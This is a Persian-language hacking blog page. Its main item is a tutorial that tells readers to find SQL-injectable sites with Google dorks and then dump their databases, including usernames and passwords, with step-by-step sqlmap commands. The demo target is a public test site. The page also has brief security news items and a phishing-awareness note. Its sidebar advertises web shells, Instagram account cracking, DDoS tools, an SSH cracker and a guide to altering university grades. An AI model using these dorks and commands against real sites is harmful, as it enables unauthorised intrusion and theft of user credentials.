💢یک محققامنیتی با نام ZwClose متوجه شد شرکت HP بروی ۴۶۰ مدل لپ تاپ خود ، کیلاگر از پیش نصب شده دارد.
351 KB :حجم فایل
hijack.blog.ir :رمز فایل
استفاده نادرست بر عهده خود شخص می باشد و نویسنده وبلاگ هیچ
گونه مسولیتی ندارد
گروه هکری ایرانی APT34 که پیش از این با نام OilRig شناخته میشد، شناسایی شد.
آموزش دامپ دیتابیس سایت ها با باگ Sql Injection با کمک ابذار Sqlmap
در قدم اول یک سایت که دارایی باگ sql داره را پیدا کنید(میتوانید از دورک های زیر استفاده کنید)
inurl:news.php?id=
inurl:pages.php?id=
inurl:post.php?id=
inurl:events.php?id=
inurl:details.php?id=
inurl:blog.php?id=
inurl:show.php?id=
تارگتی که بنده در این آموزش استفاده میکنم
http://testphp.vulnweb.com/listproducts.php?cat=1'
(سپس یک ترمینال را بازکنید(با دستور زیر دیتابیس سایت را بیرون بکشید
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 —dbs
سپس دیتابیس های سایت رو به ما در اخر نشون میده بعدش با دستور زیر جدول های دیتادیس مورد نظر خودمونو بدست میاریم
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D نام دیتابیس —tables
مثلا ما فرض رو به این میگیریم یه تیبل به ما نشون میده و اسمش هم یوزر هستش با دستور زیر ستون های دیتابیس رو بدست میاریم
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D dbname -T users —columns
فرض میکنیم که سه تا ستون زیر رو نشون میده
username
password
در نهایت با دستور زیر دیتای ستون هارو بدست میاریم
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D dbname -T users -C username password email —dump
دیتابیس شما با موفقیت دامپ شد
ومن الله توفیق
منبع: Hijack.blog.ir
💢امنیت در فضای مجازی را جدی بگیرید
💥هرگز وجود https دلیل بر اصل بودن یک پیج بانکینیست
⚠️1. تمامی بانک های مجاز به سامانه شاپرک متصل میشن
⚠️2. سایت پذیره رو اشتباه وارد کرده
⚠️3. اطلاعات پرداختو با متود get دریافت کرده
⚠️4.دارایی فیلتر می باشد
منبع: Hijack.blog.ir
جهان دست "هکر" هاست
طبقه بندی موضوعی
-
priv8
(۶) -
Other
(۴۷) -
Linux
(۹) -
Script
(۷) -
Link.Onion
(۴) -
PDF Sec-HK
(۱۲) -
Tool Hacking
(۲۴) -
News Security
(۴۰) -
Famous hackers
(۳) -
Penetration test web
(۱۰)
کلمات کلیدی
خبر امنیتی
اسکریپت
آموزش کالی لینوکس
اخبار بد افزار
ابزار هک
لینک دارک وب
فیشینگ
آیا میدانستید IT
اینفوگرافیک IT
اخبار IT
وضعیت حملات سایبری
امنیت سایبری
شل ALFA
دانلود شل الفا
دانلود ALFA shell
خبر سایبری
خبر آسیب پذیری
خبر it
بات نت
ابزار هک اندروید
بد افزار
آموزش python
ابزار ddos
هک سایت
آموزش دفیس سایت
کتاب هک و امنیت
تست نفوذ
هک از طریق سوکت وب
ابزار کنترل و مدیریت سیستم قربانی
ابزار نفوذ به سیستم
بایگانی
آخرین مطلب
- آلودگی بیش از 500000 قربانی به باج افزار VpnFilter
- حملات روز صفر | Zero day
- خبر / هک سایت آذری جهرمی
- هک شدن کارکنان FBI
- برای محفاظت از حریم خصوصی چکار کنیم؟
- هکر اؤن تور واکر
- اکسپلویت آسیب پذیر در پیام رسان داخلی iGap
- مرورگر اینترنت اکسپلورر، دام جدید هکرها
- فرق بین وب سرور و سیستم سرور
- باج افزار PUBG
پربیننده ترین مطالب
- لینک وبسایت های دارک وب
- Dorks SQl Injection 2017
- اسکریپت کرک اکانت اینستاگرام
- دانلود شل الفا | ALFA shell
- آموزش راه اندازی اینترنت اوترنت (ماهواره ای)
- آموزش نفوذ به سیستم دانشگاهی و تغییر نمرات
- آموزش دامپ دیتابیس سایت ها
- دوره آموزشی کاربرد پایتون در هک
- ابزار SSH-Cracker
- پیدا کردن ip سایت مجهز به سیستم Cloudflare
محبوب ترین مطالب